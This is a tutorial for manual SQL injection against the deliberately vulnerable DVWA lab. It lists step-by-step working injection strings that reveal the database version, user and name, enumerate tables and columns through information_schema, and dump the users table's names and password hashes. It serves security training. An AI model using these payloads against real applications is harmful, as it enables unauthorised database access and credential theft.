Manual SQL Injection

Background Information

  • Damn Vulnerable Web App(DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
  • A SQL injection attack consists of insertion or “injection” of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.
  • When an attacker executes SQL Injection attacks, sometimes the server responds with error messages from the database server complaining that the SQL Query's syntax is incorrect. Blind SQL injection is identical to normal SQL Injection except that when an attacker attempts to exploit an application, rather then getting a useful error message, they get a generic page specified by the developer instead. This makes exploiting a potential SQL Injection attack more difficult but not impossible. An attacker can still steal data by asking a series of True and False questions through SQL statements.

Login and Set Security Setup

  • Set DVWA Security Level:
    1. Click on DVWA Security, in the left hand menu.
    2. Select “low” and click Submit

Manual SQL Injection

  • Select “SQL Injection” from the left navigation menu.

Use SQL Injection to Determine Application Users

Basic Injection

  • Instructions:
  1. Input “1” into the text box.
  2. Click Submit.
  3. Note, webpage/code is supposed to print ID, First name, and Surname to the screen.
  • Notes:
    • Below is the PHP select statement that we will be exploiting, specifically $id.
      • $getid = “SELECT first_name, last_name FROM users WHERE user_id = '$id'”;

Always True Scenario

  • Instructions:
  1. Input %' or '0'='0 into the User ID Textbox .
  2. Click Submit.
  • Notes:
    • In this scenario, we are saying display all record that are false and all records that are true.
    • %' - Will probably not be equal to anything, and will be false.
    • '0'='0' - Is equal to true, because 0 will always equal 0.
  • Database Statement
    • mysql> SELECT first_name, last_name FROM users WHERE user_id = '%' or '0'='0';

Use SQL Injection to find Database Version

  • Instructions:
  1. Input %' or 0=0 union select null, version()# into the User ID Textbox.
  2. Click Submit.
  • Notes:
    • Notice in the last displayed line, version is displayed in the surname.

Use SQL Injection to find Database User

  • Instructions:
  1. Input %' or 0=0 union select null, user() # into the User ID Textbox.
  2. Click Submit.
  • Notes:
    • Notice in the last displayed line, root@localhost is displayed in the surname.
    • This is the name of the database user that executed the behind the scenes PHP code.

Use SQL Injection to find Database Name

  • Instructions:
  1. Input %' or 0=0 union select null, database() # into the User ID Textbox.
  2. Click Submit.
  • Notes:
    • Notice in the last displayed line, dvwa is displayed in the surname.
    • This is the name of the database.

Use SQL Injection to Display all tables of Database

  • Instructions:
  1. Input a' UNION select table_schema,table_name FROM information_Schema.tables;# into the User ID Textbox.
  2. Click Submit.
  • Notes:
    • The above command will show all the tables per database.
    • From this data we will be able to enumerate tables of each database.

Use SQL Injection to Display all tables in information_schema

  • Instruction:
  1. Input %' and 1=0 union select null, table_name from information_schema.tables # into the User ID Textbox.
  2. click Submit.
  • Notes:
    • The INFORMATION_SCHEMA is the information database, the place that stores information about all the other databases that the MySQL server maintains.
    • Now we are displaying all the tables in the information_schema database.

Use SQL Injection to Display all the user tables in information_schema

  • Instructions:
    1. Input %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'# into the User ID Textbox.
    2. Click Submit
  • Notes:
    • Now we are displaying all the tables that start with the prefix “user” in the information_schema database.

Use SQL Injection to Display all the columns fields in the information_schema user table

  • Instruction:
    1. Input %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' # into the User ID Textbox.
    2. Click Submit.
  • Notes:
    • Now we are displaying all the columns in the users table.
    • Notice there are a user_id, first_name, last_name, user and Password column.

Use SQL Injection to Display all the columns field contents in the information_schema user table

  • Instructions:
  1. Input %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users # into the User ID Textbox.
  2. Click Submit.
  • Notes:
    • Now we have successfully displayed all the necessary authentication information into this database.

References

Flag Counter